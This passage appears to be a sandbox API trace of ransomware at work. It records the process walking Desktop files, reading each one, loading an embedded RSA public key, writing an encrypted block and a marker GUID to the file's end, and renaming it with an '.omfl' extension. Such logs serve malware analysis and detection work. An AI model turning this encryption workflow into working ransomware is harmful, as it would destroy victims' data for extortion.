[0130.689] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0130.689] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd20488 [0130.689] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x72e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.689] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.690] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.690] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.690] CloseHandle (hObject=0x5c8) returned 1 [0130.696] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.696] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x890) returned 0xdd29950 [0130.696] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rU_0 9PT5B8JwiK0i8_.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ru_0 9pt5b8jwik0i8_.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rU_0 9PT5B8JwiK0i8_.gif.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ru_0 9pt5b8jwik0i8_.gif.omfl")) returned 1 [0130.698] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798a8390, ftCreationTime.dwHighDateTime=0x1d5d7de, ftLastAccessTime.dwLowDateTime=0x4dcadf30, ftLastAccessTime.dwHighDateTime=0x1d5d7d3, ftLastWriteTime.dwLowDateTime=0x4dcadf30, ftLastWriteTime.dwHighDateTime=0x1d5d7d3, nFileSizeHigh=0x0, nFileSizeLow=0x6ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rxNMxRsdxUaBTe.pps", cAlternateFileName="RXNMXR~1.PPS")) returned 1 [0130.698] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.698] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rxNMxRsdxUaBTe.pps") returned=".pps" [0130.698] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rxNMxRsdxUaBTe.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rxnmxrsdxuabte.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.699] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=1791) returned 1 [0130.699] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.702] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x6d9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.702] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.703] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x6ff, lpOverlapped=0x0) returned 1 [0130.703] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.703] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.703] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.703] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3198) returned 1 [0130.704] CryptCreateHash (in: hProv=0x49d3198, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.704] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.704] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.704] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.704] GetLastError () returned 0x0 [0130.704] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.704] CryptReleaseContext (hProv=0x49d3198, dwFlags=0x0) returned 1 [0130.704] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.704] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.704] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.705] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0130.705] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x6ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.705] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.705] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.705] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.706] CloseHandle (hObject=0x5c8) returned 1 [0130.707] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rxNMxRsdxUaBTe.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rxnmxrsdxuabte.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rxNMxRsdxUaBTe.pps.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rxnmxrsdxuabte.pps.omfl")) returned 1 [0130.709] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc790460, ftCreationTime.dwHighDateTime=0x1d5e5d5, ftLastAccessTime.dwLowDateTime=0x414089e0, ftLastAccessTime.dwHighDateTime=0x1d5e692, ftLastWriteTime.dwLowDateTime=0x414089e0, ftLastWriteTime.dwHighDateTime=0x1d5e692, nFileSizeHigh=0x0, nFileSizeLow=0x8da1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SJDlFF.m4a", cAlternateFileName="")) returned 1 [0130.709] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SJDlFF.m4a") returned=".m4a" [0130.709] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SJDlFF.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sjdlff.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.709] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=36257) returned 1 [0130.709] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.712] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x8d7b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.712] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.713] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x8da1, lpOverlapped=0x0) returned 1 [0130.713] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.714] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.714] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.714] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0130.715] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.715] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.715] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.715] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.715] GetLastError () returned 0x0 [0130.715] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.715] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0130.715] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.715] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.715] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.715] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0130.716] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x8da1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.716] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.716] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.716] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.716] CloseHandle (hObject=0x5c8) returned 1 [0130.718] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SJDlFF.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sjdlff.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SJDlFF.m4a.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sjdlff.m4a.omfl")) returned 1 [0130.720] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec61fbf0, ftCreationTime.dwHighDateTime=0x1d5d9ff, ftLastAccessTime.dwLowDateTime=0x8cd3e410, ftLastAccessTime.dwHighDateTime=0x1d5e33b, ftLastWriteTime.dwLowDateTime=0x8cd3e410, ftLastWriteTime.dwHighDateTime=0x1d5e33b, nFileSizeHigh=0x0, nFileSizeLow=0x165ec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UauxvXy.mp4", cAlternateFileName="")) returned 1 [0130.720] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UauxvXy.mp4") returned=".mp4" [0130.720] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UauxvXy.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\uauxvxy.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.720] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=91628) returned 1 [0130.720] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.722] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x165c6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.723] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.723] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x165ec, lpOverlapped=0x0) returned 1 [0130.724] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.724] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.724] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.724] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0130.725] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.725] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.725] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.725] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.725] GetLastError () returned 0x0 [0130.725] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.725] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0130.725] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.725] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.725] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.726] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0130.726] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x165ec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.727] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.727] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.727] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.727] CloseHandle (hObject=0x5c8) returned 1 [0130.728] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UauxvXy.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\uauxvxy.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UauxvXy.mp4.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\uauxvxy.mp4.omfl")) returned 1 [0130.730] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a3fcb10, ftCreationTime.dwHighDateTime=0x1d5e3b7, ftLastAccessTime.dwLowDateTime=0x775df090, ftLastAccessTime.dwHighDateTime=0x1d5e0e7, ftLastWriteTime.dwLowDateTime=0x775df090, ftLastWriteTime.dwHighDateTime=0x1d5e0e7, nFileSizeHigh=0x0, nFileSizeLow=0x3ff3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VY4ocALoC.jpg", cAlternateFileName="VY4OCA~1.JPG")) returned 1 [0130.730] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VY4ocALoC.jpg") returned=".jpg" [0130.730] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VY4ocALoC.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vy4ocaloc.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.730] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=16371) returned 1 [0130.730] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.734] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x3fcd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.734] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.735] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x3ff3, lpOverlapped=0x0) returned 1 [0130.736] lstrlenA (lpString="-----BEGIN PUBLIC 